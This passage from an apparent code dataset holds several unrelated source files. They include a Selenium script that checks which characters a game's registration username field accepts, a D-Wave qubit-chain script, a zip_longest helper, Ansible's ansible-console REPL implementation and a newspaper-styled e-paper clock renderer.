df_topics['topic-id']=range(0,df_topics.shape[0])\n df_topics.to_csv(path_topics,columns={'topic-id','topic'},sep=\",\",encoding=\"utf-8\",index=False)\n\n\n#extract_topics()\npreprocess()","repo_name":"webis-de/topic-ontologies-for-arguments","sub_path":"preprocessing/preprocess_ibm_debater_claim_evidence_acl.py","file_name":"preprocess_ibm_debater_claim_evidence_acl.py","file_ext":"py","file_size_in_byte":2994,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"88"} +{"seq_id":"38389468532","text":"import time\n\nfrom selenium.common.exceptions import WebDriverException\nfrom selenium.webdriver.chrome.options import Options\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\n\nfrom utf8_iterator import utf8_iterator\n\n\nclass Checker:\n def __init__(self):\n self.browser = webdriver.Chrome(ChromeDriverManager().install())\n self.allowed_characters = []\n\n def char_is_allowed(self):\n checkmark = self.browser.find_element(By.XPATH, '//*[@id=\"id_random_characters\"]/i')\n return bool('fa_ok' in checkmark.get_attribute('class'))\n\n def start(self):\n self.open_page('https://account.elderscrollsonline.com/register/account-information')\n element_input_field = self.browser.find_element(By.XPATH, '//*[@id=\"user_screen_name\"]')\n\n j = 0\n last_printout = ''\n for i, char in enumerate(utf8_iterator()):\n # We are not interested in these characters:\n # < 32 - special characters\n # 39 - \"'\"\n # 45 - \"-\"\n # 46 - \".\"\n # 48-122 - \"0-9, A-Z, a-z\n # 127 - special character\n\n if i < 128:\n continue\n\n element_input_field.clear()\n element_input_field.send_keys('Test')\n\n element_input_field.send_keys(char, 'end')\n\n last_printout = f'{char} {i}\\t'\n print(last_printout, end='')\n\n time.sleep(0.33)\n\n if self.char_is_allowed():\n j += 1\n if j >= 10:\n print()\n j = 0\n self.allowed_characters.append(char)\n else:\n print('\\010' * len(last_printout), end='')\n\n self.stop()\n\n def enter_date(self):\n field_year = self.browser.find_element(By.XPATH, '//*[@id=\"date_year\"]')\n field_month = self.browser.find_element(By.XPATH, '//*[@id=\"date_month\"]')\n 
field_day = self.browser.find_element(By.XPATH, '//*[@id=\"date_day\"]')\n\n field_year.send_keys('1997')\n # TODO: english support\n field_month.send_keys('апреля')\n field_day.send_keys('3')\n\n button_send = self.browser.find_element(By.XPATH, '//*[@id=\"age-gate\"]/form/div[2]/input')\n button_send.submit()\n\n def open_page(self, address: str):\n self.browser.get(address)\n\n # if enter your date of birth presented\n # TODO: english support\n if 'ВВЕДИТЕ ДАТУ РОЖДЕНИЯ' in self.browser.page_source:\n self.enter_date()\n\n def stop(self):\n try:\n self.browser.close()\n except: # Silence all exception because we can\n pass\n self.print_all_allowed_characters()\n\n def print_all_allowed_characters(self):\n print('Valid characters are: ')\n for i, character in enumerate(self.allowed_characters):\n if i and i % 10 == 0:\n print()\n print(character, end='\\t')\n\n def __del__(self):\n self.stop()\n\n\nif __name__ == '__main__':\n instance = Checker()\n try:\n instance.start()\n except KeyboardInterrupt:\n print('\\nInterrupted, wait...')\n except WebDriverException:\n print('\\nProbably, browser was closed')\n finally:\n instance = None\n","repo_name":"imPDA/eso_symbols","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"88"} +{"seq_id":"2843125268","text":"from dwave.system import DWaveSampler\r\nimport dimod\r\n\r\nsampler=DWaveSampler()\r\nqubits = sampler.nodelist\r\ncouplers = sampler.edgelist\r\n\r\n\r\nedges_linea = {}\r\ni = qubits.pop(0)\r\nnodes_linea={i:-1}\r\nkeep = True\r\nwhile keep:\r\n keep = False\r\n for j in qubits:\r\n if (i,j) in couplers:\r\n nodes_linea[j]=-1\r\n edges_linea[(i,j)]=2\r\n i=j\r\n qubits.remove(i)\r\n keep = True\r\n break\r\n\r\nbqm_linea = dimod.BinaryQuadraticModel(nodes_linea, edges_linea, 0.0, 'BINARY')\r\nprint(bqm_linea)","repo_name":"aitorgtt/Comparacion","sub_path":"crear_instancia_linea.py","file_name":"crear_instancia_linea.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"88"} +{"seq_id":"74998868126","text":"def zip_longest(*args, fill=None) -> list[tuple]:\n for elem in args:\n if not isinstance(elem, (list, tuple)):\n raise TypeError('Invalid input data, not all elements is sequence')\n\n result = []\n biggest_seq = max(args, key=len)\n\n for i in range(len(biggest_seq)):\n temp = []\n for seq in args:\n try:\n temp.append(seq[i])\n except IndexError:\n temp.append(fill)\n result.append(tuple(temp))\n\n return result\n","repo_name":"Dudnik-Denys/tasks","sub_path":"stepik_pygen_profy/profy_9/profy_9_1/profy_9_1_15.py","file_name":"profy_9_1_15.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"88"} +{"seq_id":"73100729888","text":"from __future__ import annotations\n\n# ansible.cli needs to be imported first, to ensure the source bin/* scripts run that code first\nfrom ansible.cli import CLI\n\nimport atexit\nimport cmd\nimport getpass\nimport readline\nimport os\nimport sys\n\nfrom ansible import constants as C\nfrom ansible import context\nfrom ansible.cli.arguments import option_helpers as opt_help\nfrom ansible.executor.task_queue_manager import TaskQueueManager\nfrom ansible.module_utils.common.text.converters import to_native, to_text\nfrom ansible.module_utils.parsing.convert_bool import boolean\nfrom ansible.parsing.splitter import 
parse_kv\nfrom ansible.playbook.play import Play\nfrom ansible.plugins.list import list_plugins\nfrom ansible.plugins.loader import module_loader, fragment_loader\nfrom ansible.utils import plugin_docs\nfrom ansible.utils.color import stringc\nfrom ansible.utils.display import Display\n\ndisplay = Display()\n\n\nclass ConsoleCLI(CLI, cmd.Cmd):\n '''\n A REPL that allows for running ad-hoc tasks against a chosen inventory\n from a nice shell with built-in tab completion (based on dominis'\n ``ansible-shell``).\n\n It supports several commands, and you can modify its configuration at\n runtime:\n\n - ``cd [pattern]``: change host/group\n (you can use host patterns eg.: ``app*.dc*:!app01*``)\n - ``list``: list available hosts in the current path\n - ``list groups``: list groups included in the current path\n - ``become``: toggle the become flag\n - ``!``: forces shell module instead of the ansible module\n (``!yum update -y``)\n - ``verbosity [num]``: set the verbosity level\n - ``forks [num]``: set the number of forks\n - ``become_user [user]``: set the become_user\n - ``remote_user [user]``: set the remote_user\n - ``become_method [method]``: set the privilege escalation method\n - ``check [bool]``: toggle check mode\n - ``diff [bool]``: toggle diff mode\n - ``timeout [integer]``: set the timeout of tasks in seconds\n (0 to disable)\n - ``help [command/module]``: display documentation for\n the command or module\n - ``exit``: exit ``ansible-console``\n '''\n\n name = 'ansible-console'\n modules = [] # type: list[str] | None\n ARGUMENTS = {'host-pattern': 'A name of a group in the inventory, a shell-like glob '\n 'selecting hosts in inventory or any combination of the two separated by commas.'}\n\n # use specific to console, but fallback to highlight for backwards compatibility\n NORMAL_PROMPT = C.COLOR_CONSOLE_PROMPT or C.COLOR_HIGHLIGHT\n\n def __init__(self, args):\n\n super(ConsoleCLI, self).__init__(args)\n\n self.intro = 'Welcome to the ansible console. Type help or ? 
to list commands.\\n'\n\n self.groups = []\n self.hosts = []\n self.pattern = None\n self.variable_manager = None\n self.loader = None\n self.passwords = dict()\n\n self.cwd = '*'\n\n # Defaults for these are set from the CLI in run()\n self.remote_user = None\n self.become = None\n self.become_user = None\n self.become_method = None\n self.check_mode = None\n self.diff = None\n self.forks = None\n self.task_timeout = None\n self.collections = None\n\n cmd.Cmd.__init__(self)\n\n def init_parser(self):\n super(ConsoleCLI, self).init_parser(\n desc=\"REPL console for executing Ansible tasks.\",\n epilog=\"This is not a live session/connection: each task is executed in the background and returns its results.\"\n )\n opt_help.add_runas_options(self.parser)\n opt_help.add_inventory_options(self.parser)\n opt_help.add_connect_options(self.parser)\n opt_help.add_check_options(self.parser)\n opt_help.add_vault_options(self.parser)\n opt_help.add_fork_options(self.parser)\n opt_help.add_module_options(self.parser)\n opt_help.add_basedir_options(self.parser)\n opt_help.add_runtask_options(self.parser)\n opt_help.add_tasknoplay_options(self.parser)\n\n # options unique to shell\n self.parser.add_argument('pattern', help='host pattern', metavar='pattern', default='all', nargs='?')\n self.parser.add_argument('--step', dest='step', action='store_true',\n help=\"one-step-at-a-time: confirm each task before running\")\n\n def post_process_args(self, options):\n options = super(ConsoleCLI, self).post_process_args(options)\n display.verbosity = options.verbosity\n self.validate_conflicts(options, runas_opts=True, fork_opts=True)\n return options\n\n def get_names(self):\n return dir(self)\n\n def cmdloop(self):\n try:\n cmd.Cmd.cmdloop(self)\n\n except KeyboardInterrupt:\n self.cmdloop()\n\n except EOFError:\n self.display(\"[Ansible-console was exited]\")\n self.do_exit(self)\n\n def set_prompt(self):\n login_user = self.remote_user or getpass.getuser()\n self.selected = self.inventory.list_hosts(self.cwd)\n prompt = \"%s@%s (%d)[f:%s]\" % (login_user, self.cwd, len(self.selected), self.forks)\n if self.become and self.become_user in [None, 'root']:\n prompt += \"# \"\n color = C.COLOR_ERROR\n else:\n prompt += \"$ \"\n color = self.NORMAL_PROMPT\n self.prompt = stringc(prompt, color, wrap_nonvisible_chars=True)\n\n def list_modules(self):\n return list_plugins('module', self.collections)\n\n def default(self, line, forceshell=False):\n \"\"\" actually runs modules \"\"\"\n if line.startswith(\"#\"):\n return False\n\n if not self.cwd:\n display.error(\"No host found\")\n return False\n\n # defaults\n module = 'shell'\n module_args = line\n\n if forceshell is not True:\n possible_module, *possible_args = line.split()\n if module_loader.find_plugin(possible_module):\n # we found module!\n module = possible_module\n if possible_args:\n module_args = ' '.join(possible_args)\n else:\n module_args = ''\n\n if self.callback:\n cb = self.callback\n elif C.DEFAULT_LOAD_CALLBACK_PLUGINS and C.DEFAULT_STDOUT_CALLBACK != 'default':\n cb = C.DEFAULT_STDOUT_CALLBACK\n else:\n cb = 'minimal'\n\n result = None\n try:\n check_raw = module in C._ACTION_ALLOWS_RAW_ARGS\n task = dict(action=dict(module=module, args=parse_kv(module_args, check_raw=check_raw)), timeout=self.task_timeout)\n play_ds = dict(\n name=\"Ansible Shell\",\n hosts=self.cwd,\n gather_facts='no',\n tasks=[task],\n remote_user=self.remote_user,\n become=self.become,\n become_user=self.become_user,\n become_method=self.become_method,\n 
check_mode=self.check_mode,\n                diff=self.diff,\n                collections=self.collections,\n            )\n            play = Play().load(play_ds, variable_manager=self.variable_manager, loader=self.loader)\n        except Exception as e:\n            display.error(u\"Unable to build command: %s\" % to_text(e))\n            return False\n\n        try:\n            # now create a task queue manager to execute the play\n            self._tqm = None\n            try:\n                self._tqm = TaskQueueManager(\n                    inventory=self.inventory,\n                    variable_manager=self.variable_manager,\n                    loader=self.loader,\n                    passwords=self.passwords,\n                    stdout_callback=cb,\n                    run_additional_callbacks=C.DEFAULT_LOAD_CALLBACK_PLUGINS,\n                    run_tree=False,\n                    forks=self.forks,\n                )\n\n                result = self._tqm.run(play)\n                display.debug(result)\n            finally:\n                if self._tqm:\n                    self._tqm.cleanup()\n                if self.loader:\n                    self.loader.cleanup_all_tmp_files()\n\n            if result is None:\n                display.error(\"No hosts found\")\n                return False\n        except KeyboardInterrupt:\n            display.error('User interrupted execution')\n            return False\n        except Exception as e:\n            if self.verbosity >= 3:\n                import traceback\n                display.v(traceback.format_exc())\n            display.error(to_text(e))\n            return False\n\n    def emptyline(self):\n        return\n\n    def do_shell(self, arg):\n        \"\"\"\n        You can run shell commands through the shell module.\n\n        eg.:\n        shell ps uax | grep java | wc -l\n        shell killall python\n        shell halt -n\n\n        You can use the ! to force the shell module. eg.:\n        !ps aux | grep java | wc -l\n        \"\"\"\n        self.default(arg, True)\n\n    def help_shell(self):\n        display.display(\"You can run shell commands through the shell module.\")\n\n    def do_forks(self, arg):\n        \"\"\"Set the number of forks\"\"\"\n        if arg:\n            try:\n                forks = int(arg)\n            except (TypeError, ValueError):\n                display.error('Invalid argument for \"forks\"')\n                self.usage_forks()\n                return\n\n            if forks > 0:\n                self.forks = forks\n                self.set_prompt()\n\n            else:\n                display.display('forks must be greater than or equal to 1')\n        else:\n            self.usage_forks()\n\n    def help_forks(self):\n        display.display(\"Set the number of forks to use per task\")\n        self.usage_forks()\n\n    def usage_forks(self):\n        display.display('Usage: forks <number>')\n\n    do_serial = do_forks\n    help_serial = help_forks\n\n    def do_collections(self, arg):\n        \"\"\"Set list of collections for 'short name' usage\"\"\"\n        if arg in ('', 'none'):\n            self.collections = None\n        elif not arg:\n            self.usage_collections()\n        else:\n            collections = arg.split(',')\n            for collection in collections:\n                if self.collections is None:\n                    self.collections = []\n                self.collections.append(collection.strip())\n\n        if self.collections:\n            display.v('Collections name search is set to: %s' % ', '.join(self.collections))\n        else:\n            display.v('Collections name search is using defaults')\n\n    def help_collections(self):\n        display.display(\"Set the collection name search path when using short names for plugins\")\n        self.usage_collections()\n\n    def usage_collections(self):\n        display.display('Usage: collections <collection1>[,<collection2> ...]\\n   Use empty quotes or \"none\" to reset to default.\\n')\n\n    def do_verbosity(self, arg):\n        \"\"\"Set verbosity level\"\"\"\n        if not arg:\n            display.display('Usage: verbosity <number>')\n        else:\n            try:\n                display.verbosity = int(arg)\n                display.v('verbosity level set to %s' % arg)\n            except (TypeError, ValueError) as e:\n                display.error('The verbosity must be a valid integer: %s' % to_text(e))\n\n    def help_verbosity(self):\n        display.display(\"Set the verbosity level, equivalent to -v for 1 and -vvvv for 4.\")\n\n    def do_cd(self, arg):\n        \"\"\"\n        Change active host/group. You can use hosts patterns as well eg.:\n        cd webservers\n        cd webservers:dbservers\n        cd webservers:!phoenix\n        cd webservers:&staging\n        cd webservers:dbservers:&staging:!phoenix\n        \"\"\"\n        if not arg:\n            self.cwd = '*'\n        elif arg in '/*':\n            self.cwd = 'all'\n        elif self.inventory.get_hosts(arg):\n            self.cwd = arg\n        else:\n            display.display(\"no host matched\")\n\n        self.set_prompt()\n\n    def help_cd(self):\n        display.display(\"Change active host/group. \")\n        self.usage_cd()\n\n    def usage_cd(self):\n        display.display(\"Usage: cd <group>|<host>|<pattern>\")\n\n    def do_list(self, arg):\n        \"\"\"List the hosts in the current group\"\"\"\n        if not arg:\n            for host in self.selected:\n                display.display(host.name)\n        elif arg == 'groups':\n            for group in self.groups:\n                display.display(group)\n        else:\n            display.error('Invalid option passed to \"list\"')\n            self.help_list()\n\n    def help_list(self):\n        display.display(\"List the hosts in the current group or a list of groups if you add 'groups'.\")\n\n    def do_become(self, arg):\n        \"\"\"Toggle whether plays run with become\"\"\"\n        if arg:\n            self.become = boolean(arg, strict=False)\n            display.v(\"become changed to %s\" % self.become)\n            self.set_prompt()\n        else:\n            display.display(\"Please specify become value, e.g. `become yes`\")\n\n    def help_become(self):\n        display.display(\"Toggle whether the tasks are run with become\")\n\n    def do_remote_user(self, arg):\n        \"\"\"Given a username, set the remote user plays are run by\"\"\"\n        if arg:\n            self.remote_user = arg\n            self.set_prompt()\n        else:\n            display.display(\"Please specify a remote user, e.g. `remote_user root`\")\n\n    def help_remote_user(self):\n        display.display(\"Set the user for use as login to the remote target\")\n\n    def do_become_user(self, arg):\n        \"\"\"Given a username, set the user that plays are run by when using become\"\"\"\n        if arg:\n            self.become_user = arg\n        else:\n            display.display(\"Please specify a user, e.g. `become_user jenkins`\")\n            display.v(\"Current user is %s\" % self.become_user)\n        self.set_prompt()\n\n    def help_become_user(self):\n        display.display(\"Set the user for use with privilege escalation (which remote user attempts to 'become' when become is enabled)\")\n\n    def do_become_method(self, arg):\n        \"\"\"Given a become_method, set the privilege escalation method when using become\"\"\"\n        if arg:\n            self.become_method = arg\n            display.v(\"become_method changed to %s\" % self.become_method)\n        else:\n            display.display(\"Please specify a become_method, e.g. `become_method su`\")\n            display.v(\"Current become_method is %s\" % self.become_method)\n\n    def help_become_method(self):\n        display.display(\"Set the privilege escalation plugin to use when become is enabled\")\n\n    def do_check(self, arg):\n        \"\"\"Toggle whether plays run with check mode\"\"\"\n        if arg:\n            self.check_mode = boolean(arg, strict=False)\n            display.display(\"check mode changed to %s\" % self.check_mode)\n        else:\n            display.display(\"Please specify check mode value, e.g. `check yes`\")\n            display.v(\"check mode is currently %s.\" % self.check_mode)\n\n    def help_check(self):\n        display.display(\"Toggle check_mode for the tasks\")\n\n    def do_diff(self, arg):\n        \"\"\"Toggle whether plays run with diff\"\"\"\n        if arg:\n            self.diff = boolean(arg, strict=False)\n            display.display(\"diff mode changed to %s\" % self.diff)\n        else:\n            display.display(\"Please specify a diff value, e.g. `diff yes`\")\n            display.v(\"diff mode is currently %s\" % self.diff)\n\n    def help_diff(self):\n        display.display(\"Toggle diff output for the tasks\")\n\n    def do_timeout(self, arg):\n        \"\"\"Set the timeout\"\"\"\n        if arg:\n            try:\n                timeout = int(arg)\n                if timeout < 0:\n                    display.error('The timeout must be greater than or equal to 1, use 0 to disable')\n                else:\n                    self.task_timeout = timeout\n            except (TypeError, ValueError) as e:\n                display.error('The timeout must be a valid positive integer, or 0 to disable: %s' % to_text(e))\n        else:\n            self.usage_timeout()\n\n    def help_timeout(self):\n        display.display(\"Set task timeout in seconds\")\n        self.usage_timeout()\n\n    def usage_timeout(self):\n        display.display('Usage: timeout <seconds>')\n\n    def do_exit(self, args):\n        \"\"\"Exits from the console\"\"\"\n        sys.stdout.write('\\nAnsible-console was exited.\\n')\n        return -1\n\n    def help_exit(self):\n        display.display(\"LEAVE!\")\n\n    do_EOF = do_exit\n    help_EOF = help_exit\n\n    def helpdefault(self, module_name):\n        if module_name:\n            in_path = module_loader.find_plugin(module_name)\n            if in_path:\n                oc, a, _dummy1, _dummy2 = plugin_docs.get_docstring(in_path, fragment_loader)\n                if oc:\n                    display.display(oc['short_description'])\n                    display.display('Parameters:')\n                    for opt in oc['options'].keys():\n                        display.display(' ' + stringc(opt, self.NORMAL_PROMPT) + ' ' + oc['options'][opt]['description'][0])\n                else:\n                    display.error('No documentation found for %s.' % module_name)\n            else:\n                display.error('%s is not a valid command, use ? to list all valid commands.' % module_name)\n\n    def help_help(self):\n        display.warning(\"Don't be redundant!\")\n\n    def complete_cd(self, text, line, begidx, endidx):\n        mline = line.partition(' ')[2]\n        offs = len(mline) - len(text)\n\n        if self.cwd in ('all', '*', '\\\\'):\n            completions = self.hosts + self.groups\n        else:\n            completions = [x.name for x in self.inventory.list_hosts(self.cwd)]\n\n        return [to_native(s)[offs:] for s in completions if to_native(s).startswith(to_native(mline))]\n\n    def completedefault(self, text, line, begidx, endidx):\n        if line.split()[0] in self.list_modules():\n            mline = line.split(' ')[-1]\n            offs = len(mline) - len(text)\n            completions = self.module_args(line.split()[0])\n\n            return [s[offs:] + '=' for s in completions if s.startswith(mline)]\n\n    def module_args(self, module_name):\n        in_path = module_loader.find_plugin(module_name)\n        oc, a, _dummy1, _dummy2 = plugin_docs.get_docstring(in_path, fragment_loader, is_module=True)\n        return list(oc['options'].keys())\n\n    def run(self):\n\n        super(ConsoleCLI, self).run()\n\n        sshpass = None\n        becomepass = None\n\n        # hosts\n        self.pattern = context.CLIARGS['pattern']\n        self.cwd = self.pattern\n\n        # Defaults from the command line\n        self.remote_user = context.CLIARGS['remote_user']\n        self.become = context.CLIARGS['become']\n        self.become_user = context.CLIARGS['become_user']\n        self.become_method = context.CLIARGS['become_method']\n        self.check_mode = context.CLIARGS['check']\n        self.diff = context.CLIARGS['diff']\n        self.forks = context.CLIARGS['forks']\n        self.task_timeout = context.CLIARGS['task_timeout']\n\n        # set module path if needed\n        if context.CLIARGS['module_path']:\n            for path in context.CLIARGS['module_path']:\n                if path:\n                    module_loader.add_directory(path)\n\n        # dynamically add 'canonical' modules as commands, aliases could be used and dynamically loaded\n        self.modules = self.list_modules()\n        for module in self.modules:\n            setattr(self, 'do_' + module, lambda arg, module=module: self.default(module + ' ' + arg))\n            setattr(self, 'help_' 
+ module, lambda module=module: self.helpdefault(module))\n\n (sshpass, becomepass) = self.ask_passwords()\n self.passwords = {'conn_pass': sshpass, 'become_pass': becomepass}\n\n self.loader, self.inventory, self.variable_manager = self._play_prereqs()\n\n hosts = self.get_host_list(self.inventory, context.CLIARGS['subset'], self.pattern)\n\n self.groups = self.inventory.list_groups()\n self.hosts = [x.name for x in hosts]\n\n # This hack is to work around readline issues on a mac:\n # http://stackoverflow.com/a/7116997/541202\n if 'libedit' in readline.__doc__:\n readline.parse_and_bind(\"bind ^I rl_complete\")\n else:\n readline.parse_and_bind(\"tab: complete\")\n\n histfile = os.path.join(os.path.expanduser(\"~\"), \".ansible-console_history\")\n try:\n readline.read_history_file(histfile)\n except IOError:\n pass\n\n atexit.register(readline.write_history_file, histfile)\n self.set_prompt()\n self.cmdloop()\n\n def __getattr__(self, name):\n ''' handle not found to populate dynamically a module function if module matching name exists '''\n attr = None\n\n if name.startswith('do_'):\n module = name.replace('do_', '')\n if module_loader.find_plugin(module):\n setattr(self, name, lambda arg, module=module: self.default(module + ' ' + arg))\n attr = object.__getattr__(self, name)\n elif name.startswith('help_'):\n module = name.replace('help_', '')\n if module_loader.find_plugin(module):\n setattr(self, name, lambda module=module: self.helpdefault(module))\n attr = object.__getattr__(self, name)\n\n if attr is None:\n raise AttributeError(f\"{self.__class__} does not have a {name} attribute\")\n\n return attr\n\n\ndef main(args=None):\n ConsoleCLI.cli_executor(args)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"ansible/ansible","sub_path":"lib/ansible/cli/console.py","file_name":"console.py","file_ext":"py","file_size_in_byte":21719,"program_lang":"python","lang":"en","doc_type":"code","stars":59303,"dataset":"github-code","pt":"88"} +{"seq_id":"9708357589","text":"from jjrenderer.renderer import *\n\nimport random\nimport importlib\nimport datetime\nimport jjrenderer.jjtimestring as ts\n\nimport pyowm # python open weather map - for local weather in EURRRROPE\n\nimport jjlogger\nlogger = jjlogger.getLogger(__name__)\n\nclass RendererEuroClock(Renderer):\n \n name = \"clock_euro\"\n isclock = True\n menuitem = {\"icon\":\"icon_euro.png\",\"text\":\"Euro\",\"description\":\"One for every country in the union. 
Eventually...\"}\n\n def doRender(self, screen, **kwargs):\n if len(styles) > 0:\n r = random.randint(0,len(styles)-1) # select a random style\n #r = len(styles)-1\n return styles[r].doRender(self, screen, **kwargs) # pass the render down to the selected style\n else:\n return super().doRender(screen, **kwargs) # use default...\n\n# proposed style list:\n #Austria / Kleine Zeitung\n#Belgium / Gazet Van Antwerpen\n#Bulgaria / Trud\n#Croatia / Novi List\n#Cyprus / Alithia\n#Czechia / Lidove Noviny\n#Denmark / Politiken\n #Estonia / Postimees\n#Finland / Helsingin Sanomat\n #France / Le Monde\n #Germany / Bild\n#Greece / Estia\n#Hungary\n#Ireland\t\n#Italy / Corriere Della Sera\n#Latvia\n#Lithuania\n#Luxembourg\n#Malta\n#Netherlands\n#Poland\n#Portugal\n#Romania\n#Slovakia\n#Slovenia\n#Spain / El Pais\n#Sweden\n\nclass _StyleFrench(RendererEuroClock):\n def doRender(self, screen, **kwargs):\n \n # get time-related text\n t = \"Je ne connais pas l'heure\"\n d = \"Aujourd'hui\"\n if \"timestamp\" in kwargs and kwargs[\"timestamp\"]:\n t = ts.GetTimeString(kwargs[\"timestamp\"], lang=\"fr\")\n d = ts.GetDateString(kwargs[\"timestamp\"], lang=\"fr\").upper()\n logger.debug(\"time: {0}, date: {1}\".format(t,d))\n \n fill(screen)\n \n draw = ImageDraw.Draw(screen)\n pad = 50\n y = 200\n \n # logo\n logomaxheight = 200\n logomaxwidth = 800\n logo = getImage(\"logo_lemonde\")\n s = 1.0\n if logo.size[1]/logo.size[0] > logomaxheight/logomaxwidth:\n s = logomaxheight/logo.size[1]\n else:\n s = logomaxwidth/logo.size[0]\n logo = logo.resize((int(logo.size[0]*s), int(logo.size[1]*s)),Image.ANTIALIAS)\n screen.paste(logo,(int(screen.size[0]/2 - logo.size[0]/2),y))\n y = y + logo.size[1] + pad\n \n # intermediate bar\n barheight = 130\n screen.paste(0x80, box=(100, y, screen.size[0]-100, y+barheight))\n dividers = 2\n ifont1 = getFont(\"arialnarrow\",42)\n ifont2 = getFont(\"arialnarrowbold\",42)\n itext1 = [\"DERNIÈRES\", \"AFFAIRES\", \"LE MONDE\"]\n itext2 = [\"NOUVELLES\", \"EN COURS\", \"DES LIVRES\"]\n itextheight = ifont1.getsize(\"X\")[1]\n iy1 = int(y + (barheight-itextheight*2)/3)-5\n iy2 = int(y + itextheight + (barheight-itextheight*2)/3*2)\n for i in range(dividers+1):\n x = int(((screen.size[0]-200) / (dividers+1)) * (i)) + 100\n draw.text((x+20,iy1),itext1[i],font=ifont1,fill=0xFF)\n draw.text((x+20,iy2),itext2[i],font=ifont2,fill=0xFF)\n if i > 0:\n screen.paste(0xFF, box=(x-2,y+int(barheight*0.2),x+2,y+int(barheight*0.8)))\n \n y = y + barheight\n \n \n \n # date bar\n datefont = getFont(\"arialnarrowbold\", 36)\n dsz = datefont.getsize(d)\n draw.text((100,y),d,font=datefont,fill=0x00)\n \n pricefont = getFont(\"arialnarrow\", 36)\n p = \"2,50€\"\n draw.text((100+dsz[0]+50,y),p,font=pricefont,fill=0x00)\n \n w = \"WWW.LEMONDE.FR\"\n wsz = pricefont.getsize(w)\n draw.text((screen.size[0]-100-wsz[0],y),w,font=pricefont,fill=0x00)\n \n y = y + dsz[1] # + pad # seems to not need this\n \n # headline\n headlinemaxwidth = screen.size[0] - 200\n headlinefont = getFont(\"arialnarrow\", 150)\n tsz = headlinefont.getsize(t)\n headlineimg = Image.new(\"L\", tsz)\n fill(headlineimg)\n d2 = ImageDraw.Draw(headlineimg)\n d2.text((0,0),t,font=headlinefont,fill=0x00)\n if tsz[0] > headlinemaxwidth:\n headlineimg = headlineimg.resize((headlinemaxwidth, headlineimg.size[1]))\n screen.paste(headlineimg, (int(screen.size[0]/2 - headlineimg.size[0]/2),y))\n return screen\n\nclass _StyleEstonian(RendererEuroClock):\n\n def doRender(self, screen, **kwargs):\n\n bg = getImage(\"bg_postimees\")\n 
screen.paste(bg)\n draw = ImageDraw.Draw(screen)\n \n # date bar\n d = ts.daystrings_et[kwargs[\"timestamp\"].weekday()].upper()[0] + \", \" + kwargs[\"timestamp\"].strftime(\"%d.%m.%Y\")\n datefont = getFont(\"arial\", 15)\n dsz = datefont.getsize(d)\n draw.text((70,142),d,font=datefont,fill=0xFF)\n \n t = ts.GetTimeString(kwargs[\"timestamp\"], lang=\"ee\")\n print(t)\n \n # headline\n hl1font = getFont(\"arial\", 18)\n # 255,368\n draw.text((255,365),t,font=hl1font,fill=0x00)\n hl2font = getFont(\"arial\", 50)\n if len(t)>30 and \" \" in t:\n lines = ts.HalfAndHalf(t)\n else:\n lines = [t,]\n y = 480\n for l in lines:\n draw.text((72,y), l, font=hl2font, fill=0x00)\n y += 60\n\n # weather\n weatherfont = getFont(\"arialbold\",15)\n weatherdata = getWeatherByCity(\"Tallinn\", None)\n icon = None\n if weatherdata:\n logger.debug(weatherdata.current)\n icon = getWeatherIcon(weatherdata.current.weather_icon_name).resize((30,30), Image.ANTIALIAS)\n tt = \"{0:.0f}° C\".format(weatherdata.current.temperature()[\"temp\"])\n else:\n tt = \"15° C\" # dummy value if no connection\n if icon: # only paste icon if we got one\n screen.paste(icon, (194,136), icon)\n draw.text((228, 142),tt,font=weatherfont,fill=0xFF)\n return screen\n\nclass _StyleAustrian(RendererEuroClock):\n def doRender(self, screen, **kwargs):\n \n fill(screen)\n\n # box for logo\n w = int(screen.size[0] * 0.80)\n h = int(647 / 1280 * w)\n x0 = int((screen.size[0]-w)/2)\n y0 = int((screen.size[1]-h)/2)\n screen.paste(0x44, box=(x0,y0,x0+w,y0+h))\n\n # text\n th = int(208/647*h)\n tw = int(1123/1280*w)\n tpad = int(57/647*h)\n tx0 = int((screen.size[0]-tw)/2)\n ty0 = y0 + int((h-(2*th)-tpad)/2)\n t = ts.GetTimeString(kwargs[\"timestamp\"], lang=\"de\")\n lines = ts.HalfAndHalf(t)\n fonts = (getFont(\"arialblack\", 200), getFont(\"arialnarrow\", 200))\n for i in [0,1]:\n l = lines[i].upper()\n tsz = fonts[i].getsize(l)\n yoff = fonts[i].getoffset(l)[1]\n img = Image.new(\"L\", tsz)\n d = ImageDraw.Draw(img)\n d.text((0,0),l,font=fonts[i],fill=0xFF)\n img = img.crop((0, yoff, img.size[0], img.size[1]))\n img = img.resize((tw, th), Image.ANTIALIAS)\n screen.paste(img, (tx0,ty0+i*(th+tpad)), mask=img)\n\n return screen\n\nclass _StyleGerman(RendererEuroClock):\n def doRender(self, screen, **kwargs):\n\n img = Image.new(\"L\", (1000,1100)) # do this at a fixed res then resize at the end\n fill(img, 0x53)\n ns = [kwargs[\"timestamp\"].hour//10, kwargs[\"timestamp\"].hour%10, kwargs[\"timestamp\"].minute//10, kwargs[\"timestamp\"].minute%10]\n mapimg = getImage(\"map_bildfont\")\n x = 115\n y0 = 115\n for n in ns:\n cimg = mapimg.crop((n*170,0,(n+1)*170,mapimg.size[1]))\n img.paste(cimg, (x,y0))\n x += 200\n s = \"unabhängig - überparteilich\".upper()\n font = getFont(\"arialblack\", 80)\n tsz = font.getsize(s)\n ti = Image.new(\"L\", tsz)\n d = ImageDraw.Draw(ti)\n d.text((0,0),s,font=font,fill=0xFF)\n ti = ti.resize((1000-230, 60), Image.ANTIALIAS)\n img.paste(ti, (115, 950), mask=ti)\n \n # blit this onto the screen\n fill(screen)\n h = int(screen.size[1]*0.5)\n w = int(h/img.size[1]*img.size[0])\n x0 = int((screen.size[0]-w)/2)\n y0 = int((screen.size[1]-h)/2)\n screen.paste(img.resize((w,h), Image.ANTIALIAS), (x0,y0))\n \n # date\n s = \"{0},{1}.{2} {3}\".format(ts.daystrings_de[kwargs[\"timestamp\"].weekday()], kwargs[\"timestamp\"].day, 